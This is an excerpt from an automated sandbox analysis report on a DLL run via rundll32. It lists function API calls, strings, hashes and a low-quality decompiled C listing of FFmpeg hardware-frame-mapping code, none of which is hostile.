Download Yara Rule

APIs

mv_get_token.MAIN ref: 1002D267

Part of subcall function 10006940: strlen.MSVCRT ref: 10006950
Part of subcall function 10006940: mv_malloc.MAIN ref: 10006959
Part of subcall function 10006940: strspn.MSVCRT ref: 10006980
Part of subcall function 10006940: strspn.MSVCRT ref: 100069C1

strspn.MSVCRT ref: 1002D292
mv_get_token.MAIN ref: 1002D2B5
mv_log.MAIN ref: 1002D2E5
mv_opt_set.MAIN ref: 1002D302
mv_log.MAIN ref: 1002D379
mv_log.MAIN ref: 1002D3C9
mv_freep.MAIN ref: 1002D3EE

Strings

Missing key or no key/value separator found after key '%s', xrefs: 1002D3B4
Setting entry with key '%s' to value '%s', xrefs: 1002D2CC
Key '%s' not found., xrefs: 1002D364

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_logstrspn$mv_get_token$mv_freepmv_mallocmv_opt_setstrlen
String ID: Key '%s' not found.$Missing key or no key/value separator found after key '%s'$Setting entry with key '%s' to value '%s'
API String ID: 3679258194-2858522012
Opcode ID: 595c6547f65cc4bb8e71bd801e19b34be3a319f29eb8b0681d307362fd9c2fa6
Instruction ID: 7fb14f7b88a9286a04fbc63168e79df0a13211f554c8c21c667f0136fc5f52d7
Opcode Fuzzy Hash: 595c6547f65cc4bb8e71bd801e19b34be3a319f29eb8b0681d307362fd9c2fa6
Instruction Fuzzy Hash: 5B41D2B4A097409FC340EF29E48061EBBE4FF88394F91892EF5C887351EA75D940CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1002D400 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 166COMMON

Download Yara Rule

APIs

mv_log.MAIN ref: 1002D46B
mv_opt_set.MAIN ref: 1002D488
mv_opt_get_key_value.MAIN ref: 1002D4F6

Part of subcall function 1002BF30: strspn.MSVCRT ref: 1002BF4D
Part of subcall function 1002BF30: strspn.MSVCRT ref: 1002BF97
Part of subcall function 1002BF30: strchr.MSVCRT ref: 1002BFB5
Part of subcall function 1002BF30: mv_malloc.MAIN(?,?,?,?,?,?,?,?,?,?,100AEACF,100AEB86,00000000,?,1000DF13), ref: 1002BFCD
Part of subcall function 1002BF30: mv_get_token.MAIN ref: 1002BFFF

mv_strerror.MAIN ref: 1002D5A9
mv_log.MAIN ref: 1002D5D2
mv_log.MAIN ref: 1002D615
mv_log.MAIN ref: 1002D653

Strings

Unable to parse '%s': %s, xrefs: 1002D5AE
Option '%s' not found, xrefs: 1002D637
Setting '%s' to value '%s', xrefs: 1002D44C
No option name near '%s', xrefs: 1002D600

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$strspn$mv_get_tokenmv_mallocmv_opt_get_key_valuemv_opt_setmv_strerrorstrchr
String ID: No option name near '%s'$Option '%s' not found$Setting '%s' to value '%s'$Unable to parse '%s': %s
API String ID: 669169455-2003673103
Opcode ID: 42f4af90029895782656a055397532cb0e26e144a9066ca91bb51c1471e1f9dd
Instruction ID: 701acf41a1ead03db3666d664b3341f8442fad518a1ed00e3a98405c4d1a9712
Opcode Fuzzy Hash: 42f4af90029895782656a055397532cb0e26e144a9066ca91bb51c1471e1f9dd
Instruction Fuzzy Hash: 5C51F575A087509FD760EF29E48075EBBE4EFC4654F91882EE9C9C7341E774E8408B82

Uniqueness

Uniqueness Score: -1.00%

Function 1004C6B7 Relevance: 25.9, APIs: 17, Instructions: 379COMMON

Download Yara Rule

APIs

mv_tree_find.MAIN ref: 1004C757
mv_tree_find.MAIN ref: 1004C776
mv_tree_find.MAIN ref: 1004C7EF
mv_tree_find.MAIN ref: 1004C80E
mv_tree_find.MAIN ref: 1004C8CF
mv_tree_find.MAIN ref: 1004C8EE
mv_tree_find.MAIN ref: 1004C958
mv_tree_find.MAIN ref: 1004C973

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_tree_find
String ID:
API String ID: 59044961-0
Opcode ID: a2a5cd09734139798f1fd845032fbc4d271d5e899faa0ed1a3b262cc80cb7db8
Instruction ID: cce57886af535d8735bdf396c26f78100a8d8e3b141664cbd45599b0a5c3ab2e
Opcode Fuzzy Hash: a2a5cd09734139798f1fd845032fbc4d271d5e899faa0ed1a3b262cc80cb7db8
Instruction Fuzzy Hash: 4FF1AFB490974A9FC344DF2AC18091AFBE5FFC8654F61892EE888D7311E774E9418F86

Uniqueness

Uniqueness Score: -1.00%

Function 1004C704 Relevance: 25.9, APIs: 17, Instructions: 363COMMON

Download Yara Rule

APIs

mv_tree_find.MAIN ref: 1004C757
mv_tree_find.MAIN ref: 1004C776
mv_tree_find.MAIN ref: 1004C7EF
mv_tree_find.MAIN ref: 1004C80E
mv_tree_find.MAIN ref: 1004C8CF
mv_tree_find.MAIN ref: 1004C8EE

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_tree_find
String ID:
API String ID: 59044961-0
Opcode ID: 2e39002f0947aa2d0dcfdfe7d57795e1a31c696425fd7e0b4506f071d05121fc
Instruction ID: 7ec3c2c7dacb140ed4bfedfc7a75d038d4e13e51791f240047a25a975b8cf788
Opcode Fuzzy Hash: 2e39002f0947aa2d0dcfdfe7d57795e1a31c696425fd7e0b4506f071d05121fc
Instruction Fuzzy Hash: 73F1A0B490974A9FC344DF2AC18081AFBE5FFC8654F61892EE898D7311E774E9418F86

Uniqueness

Uniqueness Score: -1.00%

Function 1001E0B0 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E1001E0B0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				signed int _t213;
				signed int _t214;
				intOrPtr _t215;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t224;
				signed int _t227;
				signed int _t228;
				signed int _t230;
				signed int _t247;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t257;
				void* _t258;
				void* _t259;
				signed int _t261;
				void* _t262;
				void* _t263;
				signed char _t267;
				signed int _t268;
				signed int _t269;
				signed int _t273;
				intOrPtr _t275;
				intOrPtr _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				intOrPtr _t289;
				signed int _t291;
				signed int _t297;
				signed int _t300;
				signed int _t302;
				signed int _t304;
				signed short* _t309;
				signed short* _t310;
				int _t314;
				signed int _t324;
				intOrPtr* _t326;
				intOrPtr _t327;
				signed char _t335;
				short* _t336;
				signed char _t337;
				short* _t338;
				signed int _t339;
				signed int _t341;
				char* _t343;
				signed int _t345;
				signed int _t347;
				signed int _t349;
				signed int _t352;
				void* _t353;
				void* _t356;
				signed int _t362;
				signed int _t364;
				signed int _t368;
				signed int _t370;
				signed int _t373;
				signed short* _t374;
				signed short* _t375;
				signed int _t376;
				void* _t378;
				signed int _t381;
				intOrPtr _t382;
				signed int _t383;
				signed int _t385;
				signed int _t388;
				void* _t389;
				intOrPtr* _t390;
				signed int* _t392;
				signed int* _t396;

				_t390 = _t389 - 0x4c;
				 *((intOrPtr*)(_t390 + 0x44)) = __edi;
				 *((intOrPtr*)(_t390 + 0x3c)) = __ebx;
				_t343 =  *(_t390 + 0x54);
				 *((intOrPtr*)(_t390 + 0x48)) = _t382;
				_t289 =  *((intOrPtr*)(_t390 + 0x50));
				 *((intOrPtr*)(_t390 + 0x40)) = __esi;
				 *(_t390 + 0x28) =  *(_t390 + 0x58);
				_t383 =  *(_t289 + 0x50);
				_t362 =  *(_t289 + 0x128);
				 *(_t390 + 0x24) = _t383;
				if(_t343[0x128] == 0) {
					_t213 = _t362;
					goto L83;
				} else {
					__eflags = __esi;
					__edx =  *(__eax + 4);
					if(__esi == 0) {
						__eax = __edi[0x50];
						__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
						if( *((intOrPtr*)(__edx + 0x24)) != __edi[0x50]) {
							goto L91;
						} else {
							 *(__edx + 4) =  *( *(__edx + 4));
							__eax =  *( *( *(__edx + 4)) + 0x50);
							__eflags = __eax;
							if(__eax == 0) {
								goto L91;
							} else {
								goto L79;
							}
						}
					} else {
						__eax =  *(__esi + 4);
						__eflags = __eax - __edx;
						if(__eax == __edx) {
							__ecx =  *(__eax + 0x28);
							__eflags = __edi[0x50] -  *(__eax + 0x28);
							if(__edi[0x50] !=  *(__eax + 0x28)) {
								goto L66;
							} else {
								__eflags =  *((intOrPtr*)(__eax + 0x24)) - __ebp;
								if( *((intOrPtr*)(__eax + 0x24)) != __ebp) {
									goto L66;
								} else {
									goto L89;
								}
							}
						} else {
							L66:
							__ecx =  *(__edx + 4);
							__esp[0xb] = __ecx;
							__ecx = __ecx[0xc];
							__eflags = __ecx;
							if(__ecx == 0) {
								L68:
								__ecx = __edi[0x50];
								__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
								if( *((intOrPtr*)(__edx + 0x24)) == __edi[0x50]) {
									__esp[0xb] =  *(__esp[0xb]);
									__eax =  *( *(__esp[0xb]) + 0x50);
									__eflags = __eax;
									if(__eax != 0) {
										L79:
										__esp[2] = __edi;
										__ecx = __esp[0xa];
										__esp[1] = __ebx;
										 *__esp = __edx;
										__esp[3] = __esp[0xa];
										__eax =  *__eax();
										__eflags = __eax;
										if(__eax >= 0) {
											goto L76;
										} else {
											__eflags = __eax - 0xffffffd8;
											if(__eax != 0xffffffd8) {
												goto L73;
											} else {
												__eax =  *(__ebx + 0x128);
												L83:
												__eflags = _t213;
												if(_t213 == 0) {
													goto L91;
												} else {
													 *(_t390 + 0x24) =  *(_t289 + 0x50);
													goto L85;
												}
											}
										}
									} else {
										__eax = __esi;
										L85:
										_t215 =  *((intOrPtr*)(_t213 + 4));
										goto L69;
									}
								} else {
									L69:
									__eflags =  *((intOrPtr*)(_t215 + 0x24)) -  *(_t390 + 0x24);
									if( *((intOrPtr*)(_t215 + 0x24)) !=  *(_t390 + 0x24)) {
										L91:
										_t214 = 0xffffffd8;
										goto L76;
									} else {
										_t324 =  *( *((intOrPtr*)( *((intOrPtr*)(_t215 + 4)))) + 0x4c);
										__eflags = _t324;
										if(_t324 == 0) {
											goto L91;
										} else {
											 *(_t390 + 8) = _t343;
											 *((intOrPtr*)(_t390 + 4)) = _t289;
											 *_t390 = _t215;
											 *(_t390 + 0xc) =  *(_t390 + 0x28);
											_t214 =  *_t324();
											__eflags = _t214;
											if(_t214 >= 0) {
												goto L76;
											} else {
												__eflags = _t214 - 0xffffffd8;
												if(_t214 == 0xffffffd8) {
													goto L91;
												} else {
													L73:
													__eflags = _t362;
													if(_t362 == 0) {
														L75:
														 *(_t390 + 0x24) = _t214;
														__eflags = 0;
														 *(_t289 + 0x128) = 0;
														 *_t390 = _t289;
														E1001B300();
														_t214 =  *(_t390 + 0x24);
														 *(_t289 + 0x128) = _t362;
														 *(_t289 + 0x50) = _t383;
														goto L76;
													} else {
														__eflags =  *(_t289 + 0x128) - _t362;
														if( *(_t289 + 0x128) != _t362) {
															 *((intOrPtr*)(_t390 + 0x14)) = 0x358;
															__eflags = 0;
															 *((intOrPtr*)(_t390 + 4)) = 0;
															 *_t390 = 0;
															 *(_t390 + 0x10) = "libavutil/hwcontext.c";
															 *(_t390 + 0xc) = "orig_dst_frames == ((void *)0) || orig_dst_frames == dst->hw_frames_ctx";
															 *(_t390 + 8) = "Assertion %s failed at %s:%d\n";
															L10023A40();
															abort();
															_push(_t362);
															_push(_t289);
															_t392 = _t390 - 0x34;
															_t219 = _t392[0x10];
															_t291 = _t392[0x11];
															_t364 =  *(_t219 + 4);
															_t326 =  *((intOrPtr*)(_t364 + 4));
															_t306 =  *(_t326 + 0xc);
															__eflags =  *(_t326 + 0xc);
															if( *(_t326 + 0xc) == 0) {
																_t327 =  *_t326;
																_t307 =  *(_t327 + 0x3c);
																__eflags =  *(_t327 + 0x3c);
																if( *(_t327 + 0x3c) == 0) {
																	_t220 = 0xffffffd8;
																	goto L103;
																} else {
																	__eflags =  *(_t364 + 0x1c);
																	if( *(_t364 + 0x1c) == 0) {
																		_t220 = 0xffffffea;
																		goto L103;
																	} else {
																		 *_t392 = _t219;
																		_t221 = L10009FC0(_t291, _t307);
																		 *(_t291 + 0x128) = _t221;
																		__eflags = _t221;
																		if(_t221 == 0) {
																			goto L102;
																		} else {
																			_t392[1] = _t291;
																			 *_t392 = _t364;
																			_t224 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)))) + 0x3c))();
																			__eflags = _t224;
																			if(_t224 < 0) {
																				_t392[7] = _t224;
																				 *_t392 = _t291 + 0x128;
																				E1000A000(_t291 + 0x128, _t364);
																				_t220 = _t392[7];
																				goto L103;
																			} else {
																				 *(_t291 + 0x40) = _t291;
																				__eflags = 0;
																				return 0;
																			}
																		}
																	}
																}
															} else {
																 *((intOrPtr*)(_t291 + 0x50)) =  *((intOrPtr*)(_t364 + 0x24));
																 *_t392 = _t219;
																_t227 = L10009FC0(_t291, _t306);
																 *(_t291 + 0x128) = _t227;
																__eflags = _t227;
																if(_t227 == 0) {
																	L102:
																	_t220 = 0xfffffff4;
																	goto L103;
																} else {
																	_t228 = L1001AC40(_t291, _t343, _t364);
																	_t392[0xb] = _t228;
																	__eflags = _t228;
																	if(_t228 == 0) {
																		goto L102;
																	} else {
																		_t392[1] = _t228;
																		_t392[2] = 0;
																		_t230 =  *( *((intOrPtr*)(_t364 + 4)) + 0xc);
																		 *_t392 = _t230;
																		L96();
																		__eflags = _t230;
																		if(_t230 < 0) {
																			L109:
																			_t392[7] = _t230;
																			 *_t392 =  &(_t392[0xb]);
																			L1001ADB0(_t291);
																			return _t392[7];
																		} else {
																			 *_t392 = _t291;
																			_t392[2] =  *( *((intOrPtr*)(_t364 + 4)) + 0x10);
																			_t392[1] = _t392[0xb];
																			_t230 = E1001E0B0(_t291, _t343, _t364);
																			__eflags = _t230;
																			if(_t230 == 0) {
																				goto L109;
																			} else {
																				_t392[3] = _t230;
																				_t392[7] = _t230;
																				_t392[1] = 0x10;
																				_t392[2] = "Failed to map frame into derived frame context: %d.\n";
																				 *_t392 = _t364;
																				L10023A40();
																				 *_t392 =  &(_t392[0xb]);
																				L1001ADB0("Failed to map frame into derived frame context: %d.\n");
																				_t220 = _t392[7];
																				L103:
																				return _t220;
																			}
																		}
																	}
																}
															}
														} else {
															goto L75;
														}
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = __ecx[4] - __eax;
								if(__ecx[4] == __eax) {
									L89:
									__eax = __edi[0xb8];
									__eflags = __eax;
									if(__eax == 0) {
										 *__esp = __edx;
										__ecx = "Invalid mapping found when attempting unmap.\n";
										__ebx = 0x10;
										__esp[2] = "Invalid mapping found when attempting unmap.\n";
										__esp[1] = 0x10;
										L10023A40() = 0xffffffea;
										L76:
										return _t214;
									} else {
										__esi =  *(__eax + 4);
										__eax = E1001B300(__ebx);
										__edi = __esp[0x11];
										__ebp = __esp[0x12];
										__eax =  *__esi;
										__esp[0x14] = __ebx;
										__esi = __esp[0x10];
										__ebx = __esp[0xf];
										__esp[0x15] = __eax;
										__esp =  &(__esp[0x13]);
										_push(_t383);
										_push(_t343);
										_push(_t362);
										_t396 = _t390 - 0x1c;
										_t297 = _t396[0xd];
										_t385 = _t396[0xc];
										_t345 = _t297 + 0x158;
										 *((intOrPtr*)(_t385 + 0x50)) =  *((intOrPtr*)(_t297 + 0x50));
										 *((intOrPtr*)(_t385 + 0x44)) =  *((intOrPtr*)(_t297 + 0x44));
										 *((intOrPtr*)(_t385 + 0x48)) =  *((intOrPtr*)(_t297 + 0x48));
										 *((intOrPtr*)(_t385 + 0x4c)) =  *((intOrPtr*)(_t297 + 0x4c));
										 *(_t385 + 0x120) =  *(_t297 + 0x120);
										 *(_t385 + 0xb4) =  *(_t297 + 0xb4);
										 *(_t385 + 0xb0) =  *(_t297 + 0xb0);
										 *_t396 = _t345;
										if(L1000EC10(_t289) == 0) {
											_t283 =  *(_t297 + 0xb4);
											_t341 =  *(_t297 + 0xb0);
											if((_t283 | _t341) != 0) {
												_t396[2] = _t283;
												_t396[1] = _t341;
												 *_t396 = _t385 + 0x158;
												E1000D1B0();
											} else {
												 *(_t385 + 0x15c) =  *(_t297 + 0x120);
												 *(_t385 + 0x158) = 0;
											}
										}
										_t308 = 0;
										_t247 = E1001A6C0(_t385, 0, _t297, 0);
										_t368 = _t247;
										if(_t247 < 0) {
											L20:
											E1001A460(_t385);
											return _t368;
										} else {
											 *_t396 = _t345;
											if(L1000EC10() != 0) {
												_t396[1] = _t345;
												 *_t396 = _t385 + 0x158;
												_t253 = E1000D340();
												__eflags = _t253;
												_t368 = _t253;
												if(_t253 < 0) {
													goto L20;
												} else {
													_t254 =  *(_t297 + 0xb8);
													__eflags = _t254;
													if(_t254 != 0) {
														goto L7;
													} else {
														goto L33;
													}
												}
											} else {
												_t254 =  *(_t297 + 0xb8);
												if(_t254 == 0) {
													L33:
													 *_t396 = _t385;
													_t396[1] = 0;
													_t281 = L1001ADF0();
													__eflags = _t281;
													_t368 = _t281;
													if(_t281 < 0) {
														goto L20;
													} else {
														_t396[1] = _t297;
														 *_t396 = _t385;
														_t282 = L1001B8D0();
														__eflags = _t282;
														_t368 = _t282;
														if(_t282 < 0) {
															goto L20;
														} else {
															goto L35;
														}
													}
												} else {
													L7:
													_t370 = 0;
													L9:
													while(1) {
														if(_t254 == 0) {
															L11:
															_t370 = _t370 + 1;
															if(_t370 != 8) {
																_t254 =  *(_t297 + 0xb8 + _t370 * 4);
																continue;
															} else {
																if( *((intOrPtr*)(_t297 + 0xd8)) == 0) {
																	L22:
																	_t255 =  *(_t297 + 0x128);
																	__eflags = _t255;
																	if(_t255 == 0) {
																		L24:
																		__eflags =  *(_t297 + 0x40) - _t297;
																		if( *(_t297 + 0x40) == _t297) {
																			 *(_t385 + 0x40) = _t385;
																			goto L38;
																		} else {
																			_t352 =  *(_t385 + 0x15c);
																			_t368 = 0xffffffea;
																			__eflags = _t352;
																			if(_t352 == 0) {
																				goto L20;
																			} else {
																				_t396[1] = _t352;
																				 *_t396 = 4;
																				_t267 = E100263A0();
																				 *(_t385 + 0x40) = _t267;
																				__eflags = _t267;
																				if(_t267 == 0) {
																					goto L19;
																				} else {
																					_t314 = _t352 * 4;
																					_t378 =  *(_t297 + 0x40);
																					_t353 = _t267;
																					__eflags = _t314 - 8;
																					if(_t314 >= 8) {
																						__eflags = _t267 & 0x00000001;
																						if((_t267 & 0x00000001) != 0) {
																							_t268 =  *_t378 & 0x000000ff;
																							_t353 = _t353 + 1;
																							_t378 = _t378 + 1;
																							_t314 = _t314 - 1;
																							 *(_t353 - 1) = _t268;
																						}
																						__eflags = _t353 & 0x00000002;
																						if((_t353 & 0x00000002) != 0) {
																							_t269 =  *_t378 & 0x0000ffff;
																							_t353 = _t353 + 2;
																							_t378 = _t378 + 2;
																							_t314 = _t314 - 2;
																							 *(_t353 - 2) = _t269;
																						}
																						__eflags = _t353 & 0x00000004;
																						if((_t353 & 0x00000004) == 0) {
																							goto L28;
																						} else {
																							_t356 = _t353 + 4;
																							 *(_t356 - 4) =  *_t378;
																							memcpy(_t356, _t378 + 4, _t314 - 4);
																							_t396 =  &(_t396[3]);
																							goto L38;
																						}
																						L50:
																						_t338 = _t337 + _t262;
																						_t375 = _t374 + _t262;
																						_t263 = 0;
																						__eflags = _t349 & 0x00000002;
																						if((_t349 & 0x00000002) != 0) {
																							 *_t338 =  *_t375 & 0x0000ffff;
																							_t263 = 2;
																						}
																						__eflags = _t349 & 0x00000001;
																						if((_t349 & 0x00000001) == 0) {
																							L35:
																							_t376 = 0;
																							__eflags = 0;
																						} else {
																							_t376 = 0;
																							 *((char*)(_t338 + _t263)) =  *(_t375 + _t263) & 0x000000ff;
																						}
																						return _t376;
																						goto L113;
																					} else {
																						L28:
																						memcpy(_t353, _t378, _t314);
																						_t396 =  &(_t396[3]);
																					}
																					L38:
																					__eflags = _t385 & 0x00000001;
																					_t335 = _t385;
																					_t309 = _t297;
																					_t347 = 0x20;
																					if((_t385 & 0x00000001) != 0) {
																						_t335 = _t385 + 1;
																						_t347 = 0x1f;
																						_t309 = _t297 + 1;
																						 *_t385 =  *_t297 & 0x000000ff;
																					}
																					__eflags = _t335 & 0x00000002;
																					if((_t335 & 0x00000002) != 0) {
																						_t257 =  *_t309 & 0x0000ffff;
																						_t335 = _t335 + 2;
																						_t309 =  &(_t309[1]);
																						_t347 = _t347 - 2;
																						 *(_t335 - 2) = _t257;
																					}
																					_t396[0xd] = _t297;
																					_t258 = 0;
																					_t373 = _t347 & 0xfffffffc;
																					__eflags = _t373;
																					do {
																						 *(_t335 + _t258) =  *(_t309 + _t258);
																						_t258 = _t258 + 4;
																						__eflags = _t258 - _t373;
																					} while (_t258 < _t373);
																					_t336 = _t335 + _t258;
																					_t310 = _t309 + _t258;
																					_t300 = _t396[0xd];
																					_t259 = 0;
																					__eflags = _t347 & 0x00000002;
																					if((_t347 & 0x00000002) != 0) {
																						 *_t336 =  *_t310 & 0x0000ffff;
																						_t259 = 2;
																					}
																					__eflags = _t347 & 0x00000001;
																					if((_t347 & 0x00000001) != 0) {
																						 *((char*)(_t336 + _t259)) =  *(_t310 + _t259) & 0x000000ff;
																					}
																					__eflags = _t385 & 0x00000001;
																					_t349 = 0x20;
																					_t337 = _t385 + 0x20;
																					_t374 = _t300 + 0x20;
																					if((_t385 & 0x00000001) != 0) {
																						_t337 = _t385 + 0x21;
																						_t349 = 0x1f;
																						_t374 = _t300 + 0x21;
																						 *(_t385 + 0x20) =  *(_t300 + 0x20) & 0x000000ff;
																					}
																					__eflags = _t337 & 0x00000002;
																					if((_t337 & 0x00000002) != 0) {
																						_t261 =  *_t374 & 0x0000ffff;
																						_t337 = _t337 + 2;
																						_t374 =  &(_t374[1]);
																						_t349 = _t349 - 2;
																						 *(_t337 - 2) = _t261;
																					}
																					_t262 = 0;
																					_t302 = _t349 & 0xfffffffc;
																					__eflags = _t302;
																					do {
																						 *(_t337 + _t262) =  *(_t374 + _t262);
																						_t262 = _t262 + 4;
																						__eflags = _t262 - _t302;
																					} while (_t262 < _t302);
																					goto L50;
																				}
																			}
																		}
																	} else {
																		 *_t396 = _t255;
																		_t273 = L10009FC0(_t297, _t308);
																		 *(_t385 + 0x128) = _t273;
																		__eflags = _t273;
																		if(_t273 == 0) {
																			goto L19;
																		} else {
																			goto L24;
																		}
																	}
																} else {
																	_t308 = 4;
																	_t396[1] = 4;
																	 *_t396 =  *(_t297 + 0xdc);
																	_t275 = E100266D0();
																	 *((intOrPtr*)(_t385 + 0xd8)) = _t275;
																	if(_t275 == 0) {
																		goto L19;
																	} else {
																		_t339 =  *(_t297 + 0xdc);
																		 *(_t385 + 0xdc) = _t339;
																		if(_t339 <= 0) {
																			goto L22;
																		} else {
																			_t396[0xc] = _t385;
																			_t388 = _t297;
																			_t304 = 0;
																			while(1) {
																				_t381 = _t304 * 4;
																				 *_t396 =  *( *((intOrPtr*)(_t388 + 0xd8)) + _t381);
																				 *((intOrPtr*)(_t275 + _t381)) = L10009FC0(_t304, _t308);
																				_t275 =  *((intOrPtr*)(_t396[0xc] + 0xd8));
																				if( *((intOrPtr*)(_t275 + _t381)) == 0) {
																					break;
																				}
																				_t304 = _t304 + 1;
																				__eflags =  *((intOrPtr*)(_t388 + 0xdc)) - _t304;
																				if( *((intOrPtr*)(_t388 + 0xdc)) <= _t304) {
																					_t297 = _t388;
																					_t385 = _t396[0xc];
																					goto L22;
																				} else {
																					continue;
																				}
																				goto L113;
																			}
																			_t385 = _t396[0xc];
																			goto L19;
																		}
																	}
																}
															}
														} else {
															 *_t396 = _t254;
															_t280 = L10009FC0(_t297, _t308);
															 *((intOrPtr*)(_t385 + 0xb8 + _t370 * 4)) = _t280;
															if(_t280 == 0) {
																L19:
																_t368 = 0xfffffff4;
																goto L20;
															} else {
																goto L11;
															}
														}
														goto L113;
													}
												}
											}
										}
									}
								} else {
									goto L68;
								}
							}
						}
					}
				}
				L113:
			}

0x1001e0b0
0x1001e0b3
0x1001e0bb
0x1001e0bf
0x1001e0c3
0x1001e0c7
0x1001e0cb
0x1001e0cf
0x1001e0d9
0x1001e0dc
0x1001e0e4
0x1001e0e8
0x1001e200
0x00000000
0x1001e0ee
0x1001e0ee
0x1001e0f0
0x1001e0f3
0x1001e1b0
0x1001e1b3
0x1001e1b6
0x00000000
0x1001e1bc
0x1001e1bf
0x1001e1c1
0x1001e1c4
0x1001e1c6
0x00000000
0x00000000
0x00000000
0x00000000
0x1001e1c6
0x1001e0f9
0x1001e0f9
0x1001e0fc
0x1001e0fe
0x1001e218
0x1001e21b
0x1001e21e
0x00000000
0x1001e224
0x1001e224
0x1001e227
0x00000000
0x00000000
0x00000000
0x00000000
0x1001e227
0x1001e104
0x1001e104
0x1001e104
0x1001e107
0x1001e10b
0x1001e10e
0x1001e110
0x1001e11b
0x1001e11b
0x1001e11e
0x1001e121
0x1001e27e
0x1001e280
0x1001e283
0x1001e285
0x1001e1cc
0x1001e1cc
0x1001e1d0
0x1001e1d4
0x1001e1d8
0x1001e1db
0x1001e1df
0x1001e1e1
0x1001e1e3
0x00000000
0x1001e1e5
0x1001e1e5
0x1001e1e8
0x00000000
0x1001e1ee
0x1001e1ee
0x1001e202
0x1001e202
0x1001e204
0x00000000
0x1001e206
0x1001e209
0x00000000
0x1001e209
0x1001e204
0x1001e1e8
0x1001e28b
0x1001e28b
0x1001e20d
0x1001e20d
0x00000000
0x1001e20d
0x1001e127
0x1001e127
0x1001e12b
0x1001e12e
0x1001e270
0x1001e270
0x00000000
0x1001e134
0x1001e139
0x1001e13c
0x1001e13e
0x00000000
0x1001e144
0x1001e144
0x1001e14c
0x1001e150
0x1001e153
0x1001e157
0x1001e159
0x1001e15b
0x00000000
0x1001e15d
0x1001e15d
0x1001e160
0x00000000
0x1001e166
0x1001e166
0x1001e166
0x1001e168
0x1001e176
0x1001e176
0x1001e17a
0x1001e17c
0x1001e182
0x1001e185
